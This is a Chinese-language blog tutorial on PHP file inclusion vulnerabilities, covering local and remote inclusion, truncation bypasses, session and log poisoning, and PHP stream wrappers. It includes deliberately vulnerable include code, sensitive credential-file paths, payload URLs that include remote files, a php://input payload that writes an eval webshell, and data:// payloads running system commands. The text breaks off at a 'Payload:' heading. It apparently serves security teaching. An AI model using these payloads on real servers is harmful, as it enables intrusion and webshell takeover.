
<!DOCTYPE html>
<html lang="zh-CN" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>文件包含漏洞 - Hexo</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="0×01 文件包含简介服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP来执行，这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。,"> 
    <meta name="author" content="John Doe"> 
    <link rel="alternative" href="atom.xml" title="Hexo" type="application/atom+xml"> 
    <link rel="icon" href="/img/85E0B2FE93C1D59651632D67AC59568B.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

<meta name="generator" content="Hexo 5.4.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">Hexo</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">文件包含漏洞</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">文件包含漏洞</h1>
        <div class="stuff">
            <span>四月 27, 2022</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" rel="tag">文件包含漏洞</a></li></ul>


        </div>
        <div class="content markdown">
            <h2 id="0×01-文件包含简介"><a href="#0×01-文件包含简介" class="headerlink" title="0×01 文件包含简介"></a>0×01 文件包含简介</h2><p>服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP来执行，这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，您只更新一个包含文件就可以了，或者当您向网站添加一张新页面时，仅仅需要修改一下菜单文件（而不是更新所有网页中的链接）。</p>
<h3 id="文件包含函数"><a href="#文件包含函数" class="headerlink" title="文件包含函数"></a>文件包含函数</h3><p>PHP中文件包含函数有以下四种：</p>
<blockquote>
<p>require()</p>
<p>require_once()</p>
<p>include()</p>
<p>include_once()</p>
</blockquote>
<p><code>include</code>和<code>require</code>区别主要是，<code>include</code>在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行；而<code>require</code>函数出现错误的时候，会直接报错并退出程序的执行。</p>
<p>而<code>include_once()</code>，<code>require_once()</code>这两个函数，与前两个的不同之处在于这两个函数只包含一次，适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下，你想确保它只被包括一次以避免函数重定义，变量重新赋值等问题。</p>
<p>除了incldue()等4个函数之外，PHP中能够对文件进行操作的函数都有可能出现漏洞。虽然大多数情况下不能执行PHP代码，但能够读取敏感文件带来的后果也是比较严重的。例如: fopen()、fread()</p>
<h3 id="漏洞产生原因"><a href="#漏洞产生原因" class="headerlink" title="漏洞产生原因"></a>漏洞产生原因</h3><p>文件包含函数加载的参数没有经过过滤或者严格的定义，可以被用户控制，包含其他恶意文件，导致了执行了非预期的代码。</p>
<p>示例代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>例如：</p>
<p><code>$_GET[&#39;filename&#39;]</code>参数开发者没有经过严格的过滤，直接带入了include的函数，攻击者可以修改<code>$_GET[&#39;filename&#39;]</code>的值，执行非预期的操作。</p>
<h2 id="0×02-本地文件包含漏洞"><a href="#0×02-本地文件包含漏洞" class="headerlink" title="0×02 本地文件包含漏洞"></a>0×02 本地文件包含漏洞</h2><p>本地文件包含就是通过浏览器包含web服务器上的文件，这种漏洞是因为浏览器包含文件时没有进行严格的过滤允许遍历目录的字符注入浏览器并执行。</p>
<h3 id="无限制本地文件包含漏洞"><a href="#无限制本地文件包含漏洞" class="headerlink" title="无限制本地文件包含漏洞"></a>无限制本地文件包含漏洞</h3><p><strong>测试代码：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>测试结果：</strong></p>
<p>通过目录遍历漏洞可以获取到系统中其他文件的内容：</p>
<p><strong>常见的敏感信息路径：</strong></p>
<p>Windows系统</p>
<blockquote>
<p>c:\boot.ini // 查看系统版本</p>
<p>c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件</p>
<p>c:\windows\repair\sam // 存储Windows系统初次安装的密码</p>
<p>c:\ProgramFiles\mysql\my.ini // MySQL配置</p>
<p>c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码</p>
<p>c:\windows\php.ini // php 配置信息</p>
</blockquote>
<p>Linux/Unix系统</p>
<blockquote>
<p>/etc/passwd // 账户信息</p>
<p>/etc/shadow // 账户密码文件</p>
<p>/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件</p>
<p>/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置</p>
<p>/usr/local/app/php5/lib/php.ini // PHP相关配置</p>
<p>/etc/httpd/conf/httpd.conf // Apache配置文件</p>
<p>/etc/my.conf // mysql 配置文件</p>
</blockquote>
<p><strong>任意目录遍历</strong></p>
<p>除了这种攻击方式，还可以使用”../../../“这样的方式来返回到上层目录中，这种方式又被称为”目录遍历(Path Traversal)”。常见的目录遍历漏洞，还可以通过不同的编码方式来绕过一些服务器端的防御逻辑(WAF)</p>
<p><strong>防御方法:</strong></p>
<p>目录遍历漏洞是一种跨越目录读取文件的方法，但当PHP配置了open_basedir时，将很好地保护服务器，使得这种攻击无效。</p>
<p>open_basedir的作用是限制在某个特定目录下PHP能打开的文件(有点像chroot的感觉)</p>
<p>比如在没有设置open_basedir时，文件包含漏洞可以访问任意文件。</p>
<p>当设置了open_basedir时，则包含文件失败。</p>
<h3 id="session文件包含漏洞"><a href="#session文件包含漏洞" class="headerlink" title="session文件包含漏洞"></a>session文件包含漏洞</h3><p><strong>利用条件：</strong></p>
<p>session的存储位置可以获取。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">session常见存储路径：</span><br><span class="line"></span><br><span class="line">/var/lib/php/sess_PHPSESSID</span><br><span class="line"></span><br><span class="line">/var/lib/php/sess_PHPSESSID</span><br><span class="line"></span><br><span class="line">/tmp/sess_PHPSESSID</span><br><span class="line"></span><br><span class="line">/tmp/sessions/sess_PHPSESSID</span><br><span class="line"></span><br><span class="line">session文件格式：sess_[phpsessid] ，而 phpsessid 在发送的请求的 cookie 字段中可以看到。</span><br></pre></td></tr></table></figure>

<p>\1. 通过phpinfo的信息可以获取到session的存储位置。</p>
<p>通过phpinfo的信息，获取到session.save_path为/var/lib/php/session：</p>
<p>\2. 通过猜测默认的session存放位置进行尝试。</p>
<p>如linux下默认存储在/var/lib/php/session目录下：</p>
<p>session中的内容可以被控制，传入恶意代码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"> </span><br><span class="line">&lt;?php</span><br><span class="line">session_start();</span><br><span class="line">$ctfs=$_GET[&#x27;ctfs&#x27;];</span><br><span class="line">$_SESSION[&quot;username&quot;]=$ctfs;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>漏洞分析</strong></p>
<p>此php会将获取到的GET型ctfs变量的值存入到session中。</p>
<p>当访问<a target="_blank" rel="noopener" href="http://www.ctfs-wiki/session.php?ctfs=ctfs">http://www.ctfs-wiki/session.php?ctfs=ctfs</a> 后，会在/var/lib/php/session目录下存储session的值。</p>
<p>session的文件名为sess_+sessionid，sessionid可以通过开发者模式获取。</p>
<p>到服务器的/var/lib/php/session目录下查看果然存在此文件</p>
<p><strong>漏洞利用</strong></p>
<p>通过上面的分析，可以知道ctfs传入的值会存储到session文件中，如果存在本地文件包含漏洞，就可以通过ctfs写入恶意代码到session文件中，然后通过文件包含漏洞执行此恶意代码getshell。</p>
<p>当访问<a target="_blank" rel="noopener" href="http://www.ctfs-wiki/session.php?ctfs=">http://www.ctfs-wiki/session.php?ctfs=</a><?php phpinfo();?>后，会在/var/lib/php/session目录下存储session的值。然后获取文件名，在/var/lib/php/session目录下下查看该文件</p>
<h3 id="有限制本地文件包含漏洞绕过"><a href="#有限制本地文件包含漏洞绕过" class="headerlink" title="有限制本地文件包含漏洞绕过"></a>有限制本地文件包含漏洞绕过</h3><p><strong>%00截断</strong></p>
<p>条件：magic_quotes_gpc = Off php版本&lt;5.3.4</p>
<p>PHP内核是由C语言实现的，因此使用了C语言中的一些字符串处理函数。在连接字符串时，0字节(x00)将作为字符串的结束符。所以在这个地方，攻击者只要在最后加入一个0字节，就能截断file变量之后的字符串。</p>
<p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span> . <span class="string">&quot;.html&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>测试结果：</p>
<figure class="highlight coffeescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//www.ctfs-wiki.com/FI/FI.php?filename=../</span>..<span class="regexp">/../</span>..<span class="regexp">/../</span>../../boot.ini%<span class="number">00</span></span><br></pre></td></tr></table></figure>

<p><strong>路径长度截断</strong></p>
<p>条件：windows OS，点号需要长于256；linux OS 长于4096</p>
<blockquote>
<p>Windows下目录最大长度为256字节，超出的部分会被丢弃；</p>
<p>Linux下目录最大长度为4096字节，超出的部分会被丢弃。</p>
</blockquote>
<p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span> . <span class="string">&quot;.html&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>EXP:</p>
<figure class="highlight coffeescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//www.ctfs-wiki.com/FI/FI.php?filename=test.txt/</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>好多个.<span class="regexp">/./</span>./</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>点号截断</strong></p>
<p>条件：windows OS，点号需要长于256</p>
<p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span> . <span class="string">&quot;.html&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>EXP:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://www.ctfs-wiki.com/FI/FI.php</span><br><span class="line">?filename=test.txt..好多个...</span><br></pre></td></tr></table></figure>

<h2 id="0×03-远程文件包含漏洞"><a href="#0×03-远程文件包含漏洞" class="headerlink" title="0×03 远程文件包含漏洞"></a>0×03 远程文件包含漏洞</h2><p>远程文件包含就是允许攻击者包含一个远程的文件,一般是在远程服务器上预先设置好的脚本。 此漏洞是因为浏览器对用户的输入没有进行检查，导致不同程度的信息泄露、拒绝服务攻击 甚至在目标服务器上执行代码</p>
<p>PHP的配置文件allow_url_fopen和allow_url_include设置为ON，include/require等包含函数可以加载远程文件，如果远程文件没经过严格的过滤，导致了执行恶意文件的代码，这就是远程文件包含漏洞。</p>
<blockquote>
<p>allow_url_fopen = On（是否允许打开远程文件）</p>
<p>allow_url_include = On（是否允许include/require远程文件）</p>
</blockquote>
<h3 id="无限制远程文件包含漏洞"><a href="#无限制远程文件包含漏洞" class="headerlink" title="无限制远程文件包含漏洞"></a>无限制远程文件包含漏洞</h3><p><strong>测试代码：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过远程文件包含漏洞，包含php.txt可以解析。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.133/FI/php.txt</span><br></pre></td></tr></table></figure>

<h3 id="有限制远程文件包含漏洞绕过"><a href="#有限制远程文件包含漏洞绕过" class="headerlink" title="有限制远程文件包含漏洞绕过"></a>有限制远程文件包含漏洞绕过</h3><p><strong>测试代码</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>] . <span class="string">&quot;.html&quot;</span>); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>问号绕过</strong></p>
<p>相当与截断</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?</span><br></pre></td></tr></table></figure>

<p><strong>#号绕过</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23</span><br></pre></td></tr></table></figure>

<p> <strong>空格绕过</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20</span><br></pre></td></tr></table></figure>

<h2 id="0×04-PHP伪协议"><a href="#0×04-PHP伪协议" class="headerlink" title="0×04 PHP伪协议"></a>0×04 PHP伪协议</h2><p>PHP 带有很多内置 URL 风格的封装协议，可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议，还能通过 stream_wrapper_register() 来注册自定义的封装协议。</p>
<h3 id="php-输入输出流"><a href="#php-输入输出流" class="headerlink" title="php:// 输入输出流"></a>php:// 输入输出流</h3><p>PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</p>
<h3 id="php-filter（本地磁盘文件进行读取）"><a href="#php-filter（本地磁盘文件进行读取）" class="headerlink" title="php://filter（本地磁盘文件进行读取）"></a>php://filter（本地磁盘文件进行读取）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter可以获取指定文件源码。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，让其不执行。从而导致 任意文件读取。</span><br></pre></td></tr></table></figure>

<p>元封装器，设计用于”数据流打开”时的”筛选过滤”应用，对本地磁盘文件进行读写。</p>
<p>用法：?filename=php://filter/convert.base64-encode/resource=xxx.php ?filename=php://filter/read=convert.base64-encode/resource=xxx.php 一样。</p>
<p>条件：只是读取，需要开启 allow_url_fopen，不需要开启 allow_url_include；</p>
<h3 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php://input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。</span><br></pre></td></tr></table></figure>

<p>可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。</p>
<p>条件：</p>
<p>php &lt;5.0 ，allow_url_include=Off 情况下也可以用</p>
<p>php &gt; 5.0，只有在allow_url_fopen=On 时才能使用</p>
<p>用法：?file=php://input 数据利用POST传过去。</p>
<p><strong>php://input （读取POST数据）</strong></p>
<p>碰到file_get_contents()就要想到用php://input绕过，因为php伪协议也是可以利用http协议的，即可以使用POST方式传数据，具体函数意义下一项；</p>
<p><strong>测试代码：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(<span class="string">&quot;php://input&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>php://input（写入木马）</strong></p>
<p><strong>测试代码：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP &lt; 5.3.0）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行。</p>
<p>如果POST的数据是执行写入一句话木马的PHP代码，就会在当前目录下写入一个木马。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?PHP</span> fputs(fopen(<span class="string">&#x27;shell.php&#x27;</span>,<span class="string">&#x27;w&#x27;</span>),<span class="string">&#x27;&lt;?php @eval($_POST[])?&gt;&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果不开启allow_url_include会报错：</p>
<p><strong>php://input（命令执行）</strong></p>
<p><strong>测试代码：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$filename</span>  = <span class="variable">$_GET</span>[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$filename</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP &lt; 5.30）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行；</p>
<p>如果不开启allow_url_include会报错：</p>
<p><strong>php://input</strong></p>
<p>内容绕过</p>
<h3 id="file-伪协议-（读取文件内容）"><a href="#file-伪协议-（读取文件内容）" class="headerlink" title="file://伪协议 （读取文件内容）"></a>file://伪协议 （读取文件内容）</h3><p>通过file协议可以访问本地文件系统，读取到文件的内容</p>
<h3 id="data-伪协议"><a href="#data-伪协议" class="headerlink" title="data://伪协议"></a>data://伪协议</h3><p>数据流封装器，和php://相似都是利用了流的概念，将原本的include的文件流重定向到了用户可控制的输入流中，简单来说就是执行文件的包含方法包含了你的输入流，通过你输入payload来实现目的； data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4</p>
<p><strong>data://（读取文件）</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。从而导致任意代码执行。</span><br></pre></td></tr></table></figure>

<p>和php伪协议的input类似，碰到file_get_contents()来用； <?php // 打印 “I love PHP" echo file_get_contents(‘data://text/plain;base64,SSBsb3ZlIFBIUAo='); ?></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">注意：&lt;span style=&quot;color: rgb(121, 121, 121);&quot;&gt;&lt;?php phpinfo();,这类执行代码最后没有?&gt;&lt;/span&gt;闭合;</span><br></pre></td></tr></table></figure>

<p>如果php.ini里的allow_url_include=On（PHP &lt; 5.3.0）,就可以造成任意代码执行，同理在这就可以理解成远程文件包含漏洞（RFI） </p>
<p>条件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_include=On</span><br><span class="line">php &gt; 5.2</span><br></pre></td></tr></table></figure>

<p><strong>文字命令</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/file.php?file=data:text/plain,&lt;?php system(whoami)?&gt;</span><br><span class="line">http://localhost/file.php?file=data:text/plain;base64,PD9waHAgc3lzdGVtKHdob2FtaSk/Pg==</span><br></pre></td></tr></table></figure>

<p><strong>图片命令</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/image.php?imagedata=data://image/jpeg;base64,.....</span><br></pre></td></tr></table></figure>

<p><strong>poc:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">data://[&lt;MIME-type&gt;][;charset=&lt;encoding&gt;][;base64],&lt;data&gt;</span><br><span class="line">?file=data://,&lt;?php phpinfo();</span><br><span class="line">?file=data://text/plain,&lt;?php phpinfo();</span><br><span class="line">?file=data://text/plain;base64,</span><br><span class="line">?file=data:text/plain,&lt;?php phpinfo();</span><br><span class="line">?file=data:text/plain;base64,</span><br></pre></td></tr></table></figure>



<h3 id="phar-伪协议"><a href="#phar-伪协议" class="headerlink" title="phar://伪协议"></a>phar://伪协议</h3><p>和zip://类似，但是phar://中相对路径和绝对路径都可以使用</p>
<p>这个参数是就是php解压缩包的一个函数，不管后缀是什么，都会当做压缩包来解压。</p>
<p>用法：?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意： PHP &gt; =5.3.0 压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用。 步骤： 写一个一句话木马文件shell.php，然后用zip协议压缩为shell.zip，然后将后缀改为png等其他格式。 </p>
<h3 id="zip-伪协议"><a href="#zip-伪协议" class="headerlink" title="zip://伪协议"></a>zip://伪协议</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">zip:// 可以访问压缩包里面的文件。当它与包含函数结合时，zip://流会被当作php文件执行。从而实现任意代码执行。</span><br><span class="line"></span><br><span class="line">zip://中只能传入绝对路径。</span><br><span class="line"></span><br><span class="line">要用#分隔压缩包和压缩包里的内容，并且#要用url编码%23（即下述POC中#要用%23替换）</span><br><span class="line"></span><br><span class="line">只需要是zip的压缩包即可，后缀名可以任意更改。</span><br><span class="line"></span><br><span class="line">相同的类型的还有zlib://和bzip2://</span><br></pre></td></tr></table></figure>

<p>zip伪协议和phar协议类似，但是用法不一样。</p>
<p>用法：?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php。</p>
<p>条件： PHP &gt; =5.3.0，注意在windows下测试要5.3.0&lt;PHP&lt;5.4 才可以 #在浏览器中要编码为%23，否则浏览器默认不会传输特殊字符。</p>
<h2 id="0x05包含日志文件"><a href="#0x05包含日志文件" class="headerlink" title="0x05包含日志文件"></a>0x05包含日志文件</h2><p>说明：比如Web服务器的访问日志文件，这是一种通用的技巧。因为几乎所有网站都会将用户的访问记录到访问日志中。因此，攻击者可以向Web日志中插入PHP代码，通过文件包含漏洞来执行包含在Web日志中的PHP代码。下面的案例中就是利用该技巧成功获取到目标网站的WebShell的。但需要注意的是，如果网站访问量大的话，日志文件可能会非常大，这时如果包含一个这么大的文件时，PHP进程可能会卡死。一般网站通常会每天生成一个新的日志文件，因此在凌晨时进行攻击相对来说容易成功。</p>
<p><strong>注意：</strong>需要开启服务器的记录日志功能</p>
<p><strong>原因：</strong></p>
<p>某php文件存在本地文件包含漏洞，但无法上传文件，利用包含漏洞包含<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=Apache&spm=1001.2101.3001.7020">Apache</a>(看服务器是Apache还是nginx)日志文件也可以获取WebShell</p>
<p><strong>日志默认路径</strong></p>
<p>apache+Linux日志默认路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/etc/httpd/logs/access_log</span><br><span class="line">/var/log/httpd/access_log</span><br></pre></td></tr></table></figure>

<p>/var/log/apache/access.log</p>
<p>apache+win2003日志默认路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">D:xampp apache/logs/access.log</span><br><span class="line">D:xampp apache/logs/error.log</span><br></pre></td></tr></table></figure>

<p>IIS6.0+win2003默认日志文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:WINDOWS system32Logfiles</span><br></pre></td></tr></table></figure>

<p>IIS7.0+win2003 默认日志文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%SystemDrive%inetpublogsLogFiles</span><br></pre></td></tr></table></figure>

<p>nginx 日志文件在用户安装目录的logs目录下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/var/log/nginx/access.log</span><br><span class="line">/var/log/nginx/error.log</span><br></pre></td></tr></table></figure>

<p>如安装目录为/usr/local/nginx,则日志目录就是在/usr/local/nginx/logs里</p>
<p>也可通过其配置文件Nginx.conf，获取到日志的存在路径（/opt/nginx/logs/access.log）</p>
<p>例1 ：包含日志一句话</p>
<p>背景：日志会记录客户端请求及服务器响应的信息，访问<a target="_blank" rel="noopener" href="http://www.xx.com/">http://www.xx.com/</a><?php phpinfo(); ?>时，<?php phpinfo(); ?>也会被记录在日志里，也可以插入到User-Agent，但是请求的信息有可能被url编码之后记录日志，这里可以<strong>通过burp来发送请求包来防止被编码</strong>，通过相对路径找到日志文件，用webshell工具连接即可</p>
<p>Payload：</p>
